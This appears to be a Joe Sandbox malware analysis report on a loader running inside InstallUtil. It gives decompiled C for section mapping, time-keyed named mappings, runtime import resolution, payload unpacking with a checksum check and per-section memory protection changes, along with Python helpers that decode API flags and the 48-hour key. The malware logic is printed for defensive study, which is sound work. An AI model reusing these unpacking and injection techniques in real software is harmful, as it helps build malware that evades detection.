                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateViewmemset
                                                            • String ID: @
                                                            • API String ID: 2533685722-2766056989
                                                            • Opcode ID: f98fdfa0b9c110206f692fa6e071b6c5229f6039fb92708234d3b282d3df2b2e
                                                            • Instruction ID: 79cf47f5c86633d9c26e27e66d3e7f98e8f199bdcf07d2fc9e6fc7d80f7c65ac
                                                            • Opcode Fuzzy Hash: f98fdfa0b9c110206f692fa6e071b6c5229f6039fb92708234d3b282d3df2b2e
                                                            • Instruction Fuzzy Hash: BD210BB5D00209AFDB11DFA9C8849EEFBB9EB48354F10443AE605F3250D7349A458B64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph (basic blocks as node: address range [call], followed by successor nodes)
                                                            • 171: 4013b7-4013e9 NtMapViewOfSection -> 172, 173
                                                            • 172: 4013eb-4013ed -> 174
                                                            • 173: 4013ef -> 174
                                                            • 174: 4013f3-4013f6
                                                            C-Code - Quality: 68%
                                                            			E004013B7(void** __esi, PVOID* _a4) {	// __esi: the same context as in E0040188D ([0] section handle, [2] page protection, [6] = +0x18 error-conversion import); *_a4 receives the view base
                                                            				long _v8;
                                                            				void* _v12;
                                                            				void* _v16;
                                                            				long _t13;
                                                            
                                                            				_v16 = 0;	// 0x004013c9  SectionOffset (LARGE_INTEGER) = 0, high dword zeroed by the stosd below
                                                            				asm("stosd");	// 0x004013cf
                                                            				_v8 = 0;	// 0x004013dd  ViewSize = 0: map the whole section
                                                            				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);	// 0x004013e4  ProcessHandle -1 = current process; InheritDisposition 2 = ViewUnmap; Win32Protect = page protection from context +8
                                                            				if(_t13 < 0) {	// 0x004013e9
                                                            					_push(_t13);	// 0x004013ef
                                                            					return __esi[6]();	// failure: same NTSTATUS-to-error import as in E0040188D (context +0x18), called with the status
                                                            				}	// 0x004013f0
                                                            				return 0;
                                                            			}

                                                            APIs
                                                            • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,004018FF,00000002,00000000,?,?,00000000,?,?,004018FF,00000002), ref: 004013E4
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: SectionView
                                                            • String ID:
                                                            • API String ID: 1323581903-0
                                                            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                            • Instruction ID: 41f1b71bfb69d62c51169e198a11b6a204b8a90c14ade405c3a2c3140c4f7bb8
                                                            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                            • Instruction Fuzzy Hash: 3DF01CB690020CBFEB119FA5CC85CAFBBBDEB44394B10493AB552E10A0D6749E189A60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
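The two section calls above are easier to read once their numeric arguments are named. The following is an added example, not Joe Sandbox tooling and not code from the sample: a small parser for the report's "APIs" lines (the `Api.Module(args), ref: addr` layout used above) that decodes the DesiredAccess, AllocationAttributes, page-protection and InheritDisposition values with the public Win32/NT constants. The two input lines are copied verbatim from the APIs lists of E0040188D and E004013B7. Names such as `ApiCall`, `PARAM_COUNT`, `describe` and `summarize` are this example's own. Note that the log prints the ProcessHandle of NtMapViewOfSection as `000000FF` while the decompilation passes `0xffffffff`; the helper reports the logged value as-is rather than guessing.

```python
"""Parse Joe Sandbox 'APIs' lines and decode section/view flags.

Added example for this report; not Joe Sandbox tooling and not the sample's
code. The sandbox prints '?' for an argument it could not recover and, after
the real parameters, further stack dwords it logged, so only the first N
entries of each call are interpreted.
"""
import re
from dataclasses import dataclass

API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

SECTION_ACCESS = {  # DesiredAccess bits; 0xF001F is SECTION_ALL_ACCESS
    0x1: "SECTION_QUERY", 0x2: "SECTION_MAP_WRITE", 0x4: "SECTION_MAP_READ",
    0x8: "SECTION_MAP_EXECUTE", 0x10: "SECTION_EXTEND_SIZE",
    0x10000: "DELETE", 0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC",
    0x80000: "WRITE_OWNER",
}
ALLOC_ATTRS = {0x1000000: "SEC_IMAGE", 0x4000000: "SEC_RESERVE",
               0x8000000: "SEC_COMMIT", 0x10000000: "SEC_NOCACHE",
               0x80000000: "SEC_LARGE_PAGES"}
PAGE_PROT = {0x1: "PAGE_NOACCESS", 0x2: "PAGE_READONLY", 0x4: "PAGE_READWRITE",
             0x8: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
INHERIT = {1: "ViewShare", 2: "ViewUnmap"}
PARAM_COUNT = {"NtCreateSection": 7, "NtMapViewOfSection": 10}  # real parameter counts


@dataclass
class ApiCall:
    api: str
    module: str
    args: list      # one int per logged argument, None where the report shows '?'
    ref: int        # address of the call instruction


def parse_api_line(line: str) -> ApiCall:
    m = API_LINE.search(line)
    if not m:
        raise ValueError(f"not an API line: {line!r}")
    args = [None if a.strip() == "?" else int(a, 16) for a in m["args"].split(",")]
    return ApiCall(m["api"], m["module"], args, int(m["ref"], 16))


def decode_flags(value, table: dict) -> list:
    """Split a bitmask into named flags; bits not in the table are kept as hex."""
    if value is None:
        return ["?"]
    names, rest = [], value
    for bit, name in sorted(table.items()):
        if value & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:x}")
    return names


def describe(call: ApiCall) -> dict:
    """Name the security-relevant parameters of the two section calls."""
    n = PARAM_COUNT.get(call.api)
    params = call.args[:n] if n else call.args
    if call.api == "NtCreateSection":
        # (SectionHandle, DesiredAccess, ObjectAttributes, MaximumSize,
        #  SectionPageProtection, AllocationAttributes, FileHandle)
        return {
            "DesiredAccess": decode_flags(params[1], SECTION_ACCESS),
            "SectionPageProtection": decode_flags(params[4], PAGE_PROT),
            "AllocationAttributes": decode_flags(params[5], ALLOC_ATTRS),
            "FileHandle": "pagefile-backed" if params[6] == 0 else f"0x{params[6]:x}",
        }
    if call.api == "NtMapViewOfSection":
        # (SectionHandle, ProcessHandle, BaseAddress, ZeroBits, CommitSize,
        #  SectionOffset, ViewSize, InheritDisposition, AllocationType, Win32Protect)
        return {
            "ProcessHandle": "?" if params[1] is None else f"0x{params[1]:x}",
            "InheritDisposition": INHERIT.get(params[7], str(params[7])),
            "Win32Protect": decode_flags(params[9], PAGE_PROT),
        }
    return {}


# Constructed input: the two lines copied verbatim from the report above.
REPORT_LINES = [
    "• NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,761B4EE0,00000000,00000000,?), ref: 004018EA",
    "• NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,004018FF,00000002,00000000,?,?,00000000,?,?,004018FF,00000002), ref: 004013E4",
]


def summarize(lines) -> dict:
    """Map each call's ref address to (api name, decoded parameters)."""
    return {c.ref: (c.api, describe(c)) for c in map(parse_api_line, lines)}


if __name__ == "__main__":
    for ref, (api, info) in summarize(REPORT_LINES).items():
        print(f"{api} @ {ref:08x}: {info}")
```

Run on the two lines it prints that the section is created with SECTION_ALL_ACCESS, SEC_COMMIT and no backing file, and that the view is mapped with ViewUnmap; the page protection is `?` in both calls because the sandbox did not recover it, which matches the decompilation, where it comes from context offset +8 rather than a constant.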

                                                            Control-flow Graph

                                                            C-Code - Quality: 69%
                                                            			E00401B52(intOrPtr __edx, long _a4, void** _a8, void** _a12) {	// _a4: mapping size, 0 = only open an existing mapping; *_a8/*_a12 receive the mapping handle and view base
                                                            				intOrPtr _v12;
                                                            				struct _FILETIME* _v16;
                                                            				short _v60;
                                                            				struct _FILETIME* _t14;
                                                            				intOrPtr _t15;
                                                            				long _t18;
                                                            				void* _t19;
                                                            				void* _t22;
                                                            				intOrPtr _t31;
                                                            				long _t32;
                                                            				void* _t34;
                                                            
                                                            				_t31 = __edx;	// 0x00401b52
                                                            				_t14 =  &_v16;	// 0x00401b5b
                                                            				GetSystemTimeAsFileTime(_t14);	// 0x00401b5f  _v16/_v12 = low/high dword of the current FILETIME
                                                            				_push(0x192);	// 0x00401b65  divisor, high dword
                                                            				_push(0x54d38000);	// 0x00401b6a  divisor, low dword: 0x19254D38000 = 1.728e12 ticks of 100 ns = exactly 48 hours
                                                            				_push(_v12);	// 0x00401b6f  dividend, high dword
                                                            				_push(_v16);	// 0x00401b72  dividend, low dword
                                                            				L00401FEC();	// 0x00401b75  _aulldiv: FILETIME / 48h, so the value only changes every two days
                                                            				_push(_t14);	// 0x00401b7a  the quotient becomes the _snwprintf argument
                                                            				_v16 = _t14;	// 0x00401b7b
                                                            				_t15 =  *0x403184;	// 0x00401b7e  relocation delta applied to the string pointers below
                                                            				_push(_t15 + 0x40405e);	// 0x00401b89  string argument (contents not shown in this report)
                                                            				_push(_t15 + 0x404054);	// 0x00401b90  format string (contents not shown in this report)
                                                            				_push(0x16);	// 0x00401b94  buffer length: 22 wide characters
                                                            				_push( &_v60);	// 0x00401b96
                                                            				_v12 = _t31;	// 0x00401b97
                                                            				L00401FE6();	// 0x00401b9a  _snwprintf: build the time-keyed object name in _v60
                                                            				_t18 = _a4;	// 0x00401b9f
                                                            				if(_t18 == 0) {	// 0x00401ba9
                                                            					_t18 = 0x1000;	// 0x00401bab  a pagefile-backed mapping needs a nonzero size even when only opening
                                                            				}	// 0x00401bab
                                                            				_t19 = CreateFileMappingW(0xffffffff, 0x403188, 4, 0, _t18,  &_v60); // executed	// 0x00401bbf  INVALID_HANDLE_VALUE = pagefile-backed; 0x403188 = SECURITY_ATTRIBUTES; 4 = PAGE_READWRITE; named with the string built above
                                                            				_t34 = _t19;	// 0x00401bc5
                                                            				if(_t34 == 0) {	// 0x00401bc9
                                                            					_t32 = GetLastError();	// 0x00401c19
                                                            				} else {	// 0x00401bcb
                                                            					if(_a4 != 0 || GetLastError() == 0xb7) {	// 0x00401bd4  with size 0 the mapping must already exist: 0xb7 = ERROR_ALREADY_EXISTS
                                                            						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed	// 0x00401bea  6 = FILE_MAP_READ | FILE_MAP_WRITE, whole mapping
                                                            						if(_t22 == 0) {	// 0x00401bf2
                                                            							_t32 = GetLastError();	// 0x00401c04
                                                            							if(_t32 != 0) {	// 0x00401c08
                                                            								goto L9;
                                                            							}
                                                            						} else {	// 0x00401bf4
                                                            							 *_a8 = _t34;	// 0x00401bf7  mapping handle out
                                                            							 *_a12 = _t22;	// 0x00401bfc  view base out
                                                            							_t32 = 0;	// 0x00401bfe
                                                            						}	// 0x00401bfe
                                                            					} else {	// 0x00401bdf
                                                            						_t32 = 2;	// 0x00401be1  ERROR_FILE_NOT_FOUND: open-only call, but the mapping did not exist yet
                                                            						L9:	// 0x00401c0a
                                                            						CloseHandle(_t34);	// 0x00401c0b
                                                            					}	// 0x00401c0b
                                                            				}	// 0x00401bd4
                                                            				return _t32;	// 0x00401c21  Win32 error code, 0 on success
                                                            			}

                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401B11,0000000A,?,?), ref: 00401B5F
                                                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401B75
                                                            • _snwprintf.NTDLL ref: 00401B9A
                                                            • CreateFileMappingW.KERNELBASE(000000FF,00403188,00000004,00000000,?,?), ref: 00401BBF
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401B11,0000000A,?), ref: 00401BD6
                                                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401BEA
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401B11,0000000A,?), ref: 00401C02
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401B11,0000000A), ref: 00401C0B
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401B11,0000000A,?), ref: 00401C13
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                            • String ID:
                                                            • API String ID: 1724014008-0
                                                            • Opcode ID: 7eed28f238bbb2be3c6924c8c0861bc85574067b5d57e3d4e00b1e628352c2d0
                                                            • Instruction ID: db596e8a5649e83c10a8c689c34e87f264774f047f8a301107ca2e73e99dd617
                                                            • Opcode Fuzzy Hash: 7eed28f238bbb2be3c6924c8c0861bc85574067b5d57e3d4e00b1e628352c2d0
                                                            • Instruction Fuzzy Hash: 4F2190B2944208BFD711AFA4DD88EAE37B9EB48355F114036F701F72E0D67499458B68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
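The divisor pushed to _aulldiv above is what makes the mapping name time-keyed: 0x192 and 0x54d38000 form the 64-bit constant 0x19254D38000, which is 1.728e12 FILETIME ticks, i.e. 48 hours. The following is an added example, not the sample's code and not Joe Sandbox tooling: it reproduces that quotient for any UTC timestamp and computes the window in which a given key is valid, which is what an analyst needs to know when the name rolls over or which key values a sample active over several days may have used. The format string at 0x404054 is not shown in this report, so the example stops at the number and does not reconstruct the name; `utc`, `time_key`, `key_window` and `keys_for_range` are this example's own names.

```python
"""Reproduce the 48-hour time key that E00401B52 feeds into its mapping name.

Added example for this report; not the sample's code and not Joe Sandbox
tooling. The decompilation divides the current FILETIME by the 64-bit constant
pushed as 0x192 (high dword) and 0x54d38000 (low dword). Only the numeric
quotient is reproduced here, never the final object name.
"""
from datetime import datetime, timedelta, timezone

DIVISOR = (0x192 << 32) | 0x54D38000       # 1_728_000_000_000 FILETIME ticks
TICKS_PER_SECOND = 10_000_000              # FILETIME counts 100 ns intervals
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def utc(*ymdhms: int) -> datetime:
    """Build an aware UTC datetime from year, month, day[, hour, minute, second]."""
    return datetime(*ymdhms, tzinfo=timezone.utc)


def to_filetime(when: datetime) -> int:
    """UTC datetime -> Windows FILETIME; naive datetimes are taken as UTC."""
    when = when.replace(tzinfo=timezone.utc) if when.tzinfo is None else when.astimezone(timezone.utc)
    delta = when - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * TICKS_PER_SECOND + delta.microseconds * 10


def window_seconds() -> int:
    """Length of one key window: the divisor converted from ticks to seconds (48 h)."""
    return DIVISOR // TICKS_PER_SECOND


def time_key(when: datetime) -> int:
    """The quotient the sample computes with _aulldiv: FILETIME // DIVISOR."""
    return to_filetime(when) // DIVISOR


def key_window(key: int) -> tuple:
    """UTC [start, end) of the window during which the sample produces `key`."""
    start = FILETIME_EPOCH + timedelta(seconds=key * window_seconds())
    return start, start + timedelta(seconds=window_seconds())


def keys_for_range(first_seen: datetime, last_seen: datetime) -> list:
    """Every key a sample active between the two timestamps may have used,
    i.e. the candidate values to try when reconstructing the name in analysis."""
    return list(range(time_key(first_seen), time_key(last_seen) + 1))


if __name__ == "__main__":
    # Constructed timestamps, chosen only to show the two-day rollover.
    for when in (utc(2022, 5, 19, 12, 0), utc(2022, 5, 21, 12, 0)):
        key = time_key(when)
        print(when.isoformat(), key, [t.isoformat() for t in key_window(key)])
```

Because the windows are aligned to the FILETIME epoch rather than to the sample's start time, two infections started minutes apart can fall on either side of a boundary; `keys_for_range` covers that case by returning every key between the first and last observation.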

                                                            Control-flow Graph

                                                            C-Code - Quality: 100%
                                                            			E004012D3(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {	// _a4: size, _a8: page protection, *_a12 receives the view base, *_a16 the 0x20-byte context
                                                            				intOrPtr _v8;
                                                            				_Unknown_base(*)()* _t29;
                                                            				_Unknown_base(*)()* _t33;
                                                            				_Unknown_base(*)()* _t36;
                                                            				_Unknown_base(*)()* _t39;
                                                            				_Unknown_base(*)()* _t42;
                                                            				intOrPtr _t46;
                                                            				struct HINSTANCE__* _t50;
                                                            				intOrPtr _t56;
                                                            
                                                            				_t56 = E00401935(0x20);	// heap-allocate the 0x20-byte context (E00401935 wraps HeapAlloc)
                                                            				if(_t56 == 0) {
                                                            					_v8 = 8;	// ERROR_NOT_ENOUGH_MEMORY
                                                            				} else {
                                                            					_t50 = GetModuleHandleA( *0x403184 + 0x404014);	// module name string, relocated by *0x403184 (contents not shown in this report)
                                                            					_v8 = 0x7f;	// ERROR_PROC_NOT_FOUND, returned if any of the five imports below is missing
                                                            					_t29 = GetProcAddress(_t50,  *0x403184 + 0x404151);
                                                            					 *(_t56 + 0xc) = _t29;	// context +0xc..+0x1c: five function pointers resolved by name; +0x18 and +0x1c are the error paths used by E0040188D and E004013B7
                                                            					if(_t29 == 0) {
                                                            						L8:
                                                            						E00401265(_t56);	// release the context on any failure
                                                            					} else {
                                                            						_t33 = GetProcAddress(_t50,  *0x403184 + 0x404161);
                                                            						 *(_t56 + 0x10) = _t33;
                                                            						if(_t33 == 0) {
                                                            							goto L8;
                                                            						} else {
                                                            							_t36 = GetProcAddress(_t50,  *0x403184 + 0x404174);
                                                            							 *(_t56 + 0x14) = _t36;
                                                            							if(_t36 == 0) {
                                                            								goto L8;
                                                            							} else {
                                                            								_t39 = GetProcAddress(_t50,  *0x403184 + 0x404189);
                                                            								 *(_t56 + 0x18) = _t39;
                                                            								if(_t39 == 0) {
                                                            									goto L8;
                                                            								} else {
                                                            									_t42 = GetProcAddress(_t50,  *0x403184 + 0x40419f);
                                                            									 *(_t56 + 0x1c) = _t42;
                                                            									if(_t42 == 0) {
                                                            										goto L8;
                                                            									} else {
                                                            										 *((intOrPtr*)(_t56 + 8)) = _a8;	// context +8: page protection used for NtCreateSection and NtMapViewOfSection
                                                            										 *((intOrPtr*)(_t56 + 4)) = _a4;	// context +4: section size
                                                            										_t46 = E0040188D(_t56, _a12); // executed	// create the section and map a zeroed view into this process
                                                            										_v8 = _t46;
                                                            										if(_t46 != 0) {
                                                            											goto L8;
                                                            										} else {
                                                            											 *_a16 = _t56;	// success: hand the populated context to the caller
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				return _v8;	// 0 on success, otherwise a Win32 error code
                                                            			}

                                                            APIs
                                                              • Part of subcall function 00401935: HeapAlloc.KERNEL32(00000000,?,004015EF,00000030,?,00000000), ref: 00401941
                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,004011FD,?,?,?,?,?,00000002,?,?), ref: 004012F7
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401319
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0040132F
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401345
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0040135B
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401371
                                                              • Part of subcall function 0040188D: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,761B4EE0,00000000,00000000,?), ref: 004018EA
                                                              • Part of subcall function 0040188D: memset.NTDLL ref: 0040190C
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                            • String ID:
                                                            • API String ID: 1632424568-0
                                                            • Opcode ID: c21fc4aabecbdcf30591a0a260aa5f3432069ce3644a4fc048a11e1732098a2f
                                                            • Instruction ID: f8ae8be61ab46346d26a7ad89e32e3b3a3e367cc1aef349a0b262ee2f135fa9d
                                                            • Opcode Fuzzy Hash: c21fc4aabecbdcf30591a0a260aa5f3432069ce3644a4fc048a11e1732098a2f
                                                            • Instruction Fuzzy Hash: DD212EB160070BAFE720DF6ACD84D6BB7ECAF44304701447AE905EB661DB74EA058B68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 100%
                                                            			_entry_() {
                                                            				void* _t1;
                                                            				int _t4;
                                                            				int _t6;
                                                            
                                                            				_t6 = 0;
                                                            				_t1 = HeapCreate(0, 0x400000, 0); // executed
                                                            				 *0x403160 = _t1;
                                                            				if(_t1 != 0) {
                                                            					 *0x403170 = GetModuleHandleA(0);
                                                            					GetCommandLineW(); // executed
                                                            					_t4 = E004015C0(); // executed
                                                            					_t6 = _t4;
                                                            					HeapDestroy( *0x403160);
                                                            				}
                                                            				ExitProcess(_t6);
                                                            			}

                                                            APIs
                                                            • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401E65
                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 00401E75
                                                            • GetCommandLineW.KERNEL32 ref: 00401E80
                                                              • Part of subcall function 004015C0: NtQuerySystemInformation.NTDLL ref: 004015FF
                                                              • Part of subcall function 004015C0: Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401646
                                                              • Part of subcall function 004015C0: GetLongPathNameW.KERNELBASE(00000030,00000000,00000000), ref: 00401675
                                                              • Part of subcall function 004015C0: GetLongPathNameW.KERNELBASE(00000030,00000000,00000000), ref: 00401693
                                                              • Part of subcall function 004015C0: CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 004016BD
                                                              • Part of subcall function 004015C0: QueueUserAPC.KERNELBASE(00401A98,00000000,?,?,00000000), ref: 004016D9
                                                            • HeapDestroy.KERNEL32 ref: 00401E93
                                                            • ExitProcess.KERNEL32 ref: 00401E9A
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: CreateHeapLongNamePath$CommandDestroyExitHandleInformationLineModuleProcessQueryQueueSleepSystemThreadUser
                                                            • String ID:
                                                            • API String ID: 2501132232-0
                                                            • Opcode ID: 75926a7ddd811df371df3967095e9d1634eab89bb0f04e0da6c08ca6a120660f
                                                            • Instruction ID: 7191445354a9c832acbed0dcd64c7ca0a75d63d9fabec9bf690f389c57a33226
                                                            • Opcode Fuzzy Hash: 75926a7ddd811df371df3967095e9d1634eab89bb0f04e0da6c08ca6a120660f
                                                            • Instruction Fuzzy Hash: 70E02675402724ABC7212F71AF0DA5F3E7CBF097967140535F606B62B0DB784A41CAAD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 86%
                                                            			E00401C24(void* __edi, intOrPtr _a4) {
                                                            				signed int _v8;
                                                            				intOrPtr _v12;
                                                            				unsigned int _v16;
                                                            				intOrPtr _v20;
                                                            				char _v24;
                                                            				void* _v28;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v36;
                                                            				intOrPtr _v40;
                                                            				intOrPtr _v48;
                                                            				intOrPtr _v52;
                                                            				intOrPtr _t46;
                                                            				void* _t53;
                                                            				intOrPtr _t54;
                                                            				intOrPtr _t58;
                                                            				signed int _t67;
                                                            				intOrPtr _t69;
                                                            				intOrPtr _t85;
                                                            				intOrPtr _t86;
                                                            
                                                            				_t85 =  *0x403170;
                                                            				_t46 = E00401000(_t85,  &_v24,  &_v16);
                                                            				_v20 = _t46;
                                                            				if(_t46 == 0) {
                                                            					asm("sbb ebx, ebx");
                                                            					_t67 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
                                                            					_t86 = _t85 + _v24;
                                                            					_v40 = _t86;
                                                            					_t53 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
                                                            					_v28 = _t53;
                                                            					if(_t53 == 0) {
                                                            						_v20 = 8;
                                                            					} else {
                                                            						_v8 = _v8 & 0x00000000;
                                                            						if(_t67 <= 0) {
                                                            							_t54 =  *0x403180;
                                                            						} else {
                                                            							_t69 = _a4;
                                                            							_t58 = _t53 - _t86;
                                                            							_t13 = _t69 + 0x4041a7; // 0x4041a7
                                                            							_v32 = _t58;
                                                            							_v36 = _t58 + _t13;
                                                            							_v12 = _t86;
                                                            							while(1) {
                                                            								asm("movsd");
                                                            								asm("movsd");
                                                            								asm("movsd");
                                                            								E00401A60(_v12 + _t58, _v12, _v52 - _v8 + _v48 + _v24 + _a4 - 1, 0x400);
                                                            								_v12 = _v12 + 0x1000;
                                                            								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
                                                            								_v8 = _v8 + 1;
                                                            								 *0x403180 = _t54;
                                                            								if(_v8 >= _t67) {
                                                            									break;
                                                            								}
                                                            								_t58 = _v32;
                                                            							}
                                                            						}
                                                            						if(_t54 != 0x69b25f44) {
                                                            							_v20 = 9;
                                                            						} else {
                                                            							E00401FAC(_v16, _v28, _v40);
                                                            						}
                                                            						VirtualFree(_v28, 0, 0x8000); // executed
                                                            					}
                                                            				}
                                                            				return _v20;
                                                            			}

                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,00000000,?,00000000,?,?,?,?,?,?,0040163F,00000000), ref: 00401C7A
                                                            • VirtualFree.KERNELBASE(0040163F,00000000,00008000,?,?,?,?,?,?,0040163F,00000000), ref: 00401D2D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.534484609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_400000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: Virtual$AllocFree
                                                            • String ID: Apr 26 2022
                                                            • API String ID: 2087232378-3671839962
                                                            • Opcode ID: 972696eea84d78f1abef1bce6428b3f82cfd358d2d0ec47ebaaeddd182fdb425
                                                            • Instruction ID: 287af2a0c01fcaa00a14418a69f75b7b10e4618bcd9a192694d8757be1fecab0
                                                            • Opcode Fuzzy Hash: 972696eea84d78f1abef1bce6428b3f82cfd358d2d0ec47ebaaeddd182fdb425
                                                            • Instruction Fuzzy Hash: 00313275D00219AFDB01CF94D984BEEB7B8FF08304F10416AE911BB291D779AA06CB98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 87%
                                                            			E0040105A(void* __eax, void* _a4) {
                                                            				signed int _v8;
                                                            				signed int _v12;
                                                            				signed int _v16;
                                                            				long _v20;
                                                            				int _t43;
                                                            				long _t54;
                                                            				signed int _t57;
                                                            				void* _t58;
                                                            				signed int _t60;
                                                            
                                                            				_v12 = _v12 & 0x00000000;
                                                            				_t57 =  *0x403180;
                                                            				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                            				_v16 =  *(__eax + 6) & 0x0000ffff;
                                                            				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
                                                            				_v8 = _v8 & 0x00000000;
                                                            				if(_v16 <= 0) {
                                                            					L12:
                                                            					return _v12;
                                                            				} else {
                                                            					goto L1;
                                                            				}
                                                            				while(1) {
                                                            					L1:
                                                            					_t60 = _v12;
                                                            					if(_t60 != 0) {
                                                            						goto L12;
                                                            					}
                                                            					asm("bt [esi+0x24], eax");
                                                            					if(_t60 >= 0) {
                                                            						asm("bt [esi+0x24], eax");
                                                            						if(__eflags >= 0) {
                                                            							L8:
                                                            							_t54 = _t57 - 0x69b25f40;
                                                            							L9:
                                                            							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                                            							if(_t43 == 0) {
                                                            								_v12 = GetLastError();
                                                            							}
                                                            							_v8 = _v8 + 1;
                                                            							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
                                                            							if(_v8 < _v16) {
                                                            								continue;
                                                            							} else {
                                                            								goto L12;
                                                            							}
                                                            						}
                                                            						asm("bt [esi+0x24], eax");
                                                            						_t54 = _t57 - 0x69b25f42;
                                                            						if(__eflags >= 0) {
                                                            							goto L9;
                                                            						}
                                                            						goto L8;
                                                            					}
                                                            					asm("bt [esi+0x24], eax");
                                                            					if(_t60 >= 0) {
                                                            						_t54 = _t57 - 0x69b25f24;
                                                            					} else {
                                                            						_t54 = _t57 - 0x69b25f04;
                                                            					}
                                                            					goto L9;
                                                            				}
                                                            				goto L12;
                                                            			}

                                                            APIs
                                                            • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401093
                                                            • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401108
                                                            • GetLastError.KERNEL32 ref: 0040110E
